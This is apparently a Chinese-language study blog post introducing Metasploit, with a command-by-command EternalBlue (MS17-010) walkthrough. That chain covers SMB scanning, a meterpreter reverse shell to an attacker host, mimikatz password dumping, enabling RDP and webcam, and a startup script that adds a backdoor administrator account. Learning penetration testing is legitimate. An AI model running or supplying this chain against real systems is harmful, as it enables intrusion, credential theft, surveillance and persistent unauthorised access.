zoukankan      html  css  js  c++  java
  • Metasploit 介绍

     

     

     

    Metasploit 介绍

      Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

      

    1.   Metasploit简称msf

      2.  msf已经集成在kali 虚拟机中

      3.  msf 攻击脚本是Ruby 语言开发的,后缀名.rb

      4.   每一种攻击方式(或者漏洞),都至少对应这一个脚本

      5.   脚本的更新,用一个Ruby 直接放在msf 中对应的目录

      

    MSF

    启动msf

            命令行下:msfconsole

            图形界面:强烈不建议,因为涉及到数据库的问题,

            很多模块不太好找

    专业术语

       exploit

       攻击的意思,

      完整的漏洞利用程序,

      在MSF 中,攻击模块,也就是一个ruby 脚本

                

      payload

      攻击载荷

      在MSF 中,payload 代表本次渗透攻击之后,所执行的代码

                

      shellcode

       在MSF 中,在渗透攻击过程中,一组机器指令(16 进制的)。

                

      模块

       软件代码组件

                

      监听器

       等待网络连接的组件

                

    常用基本命令

        show exploits        显示所有的攻击模块

        show auxiliary        显示所有的辅助模块

        search ssh_version    搜索ssh_version 关键字

        use            使用某一个脚本

        back           回到主控路径

        show payloads       显示所有可用的payloads如果在某一个模块下使用该命令,当前模块可用的,并不是所有的

                            

        show options       查看相关模块的参数配置、

        show targets       显示受到漏洞影响的目标系统类型

        set payload        设置payload

        info            显示模块详细信息

        exploit          发起攻击

        run            运行扫描模块

        

        

        

    nmap 信息搜集

    nmap -sT -A --script=smb-vuln-ms08-067.nse -P0 172.18.199.29

    nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open

     


     

     

     

        

    永恒之蓝饰演:

    扫描:

    msfconsole # 进入MSF框架

    version # 确认下MSF的版本 4.11.17 以上

    search ms17_010 # 查找漏洞模块的具体路径

    use auxiliary/scanner/smb/smb_ms17_010 # 调用漏洞扫描模块

    show option # 查看模块配置选项

    set RHOST 192.168.1.1-254 # 配置扫描目标

    set THREADS 30 #配置扫描线程

    run #运行脚本

     

    调用exploit 攻击:

    use exploit/windows/smb/ms17_010_eternalblue

    set rhost 192.168.1.112

    配置攻击载荷

    set payload windows/x64/meterpreter/reverse_tcp

    set lhost 192.168.1.118

    查看参数配置配置 :

    show options

    发起攻击:

    exploit

     

    getuid     # 查询当前用户权限为SYSTEM,获取到到最高权限

    sysinfo     # 系统信息查询,当前系统为 Windows7

    screenshot   #桌面抓图

    load mimikatz  

     wdigest  查看密码

    run post/windows/manage/enable_rdp  开启远程桌面 

    webcam_scream  #视频开启

    shell            # 进入cmd

                   C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup  开机启动位置

     添加 psl.bat:

                   echo net user ppp 123.com /add >ppp.bat

                   echo net localgroup administrators ppp /add >>ppp.bat

                 

     

     

     

    本博客记录Sylon的学习总结和学习情况做记录 望今后能记录自己的学习之路,同时分享高品质博文!!!
  • 相关阅读:
    poj 2187 Beauty Contest(旋转卡壳)
    poj 2540 Hotter Colder(极角计算半平面交)
    poj 1279 Art Gallery(利用极角计算半平面交)
    poj 3384 Feng Shui(半平面交的联机算法)
    poj 1151 Atlantis(矩形面积并)
    zoj 1659 Mobile Phone Coverage(矩形面积并)
    uva 10213 How Many Pieces of Land (欧拉公式计算多面体)
    uva 190 Circle Through Three Points(三点求外心)
    zoj 1280 Intersecting Lines(两直线交点)
    poj 1041 John's trip(欧拉回路)
  • 原文地址:https://www.cnblogs.com/Sylon/p/11747472.html
Copyright © 2011-2022 走看看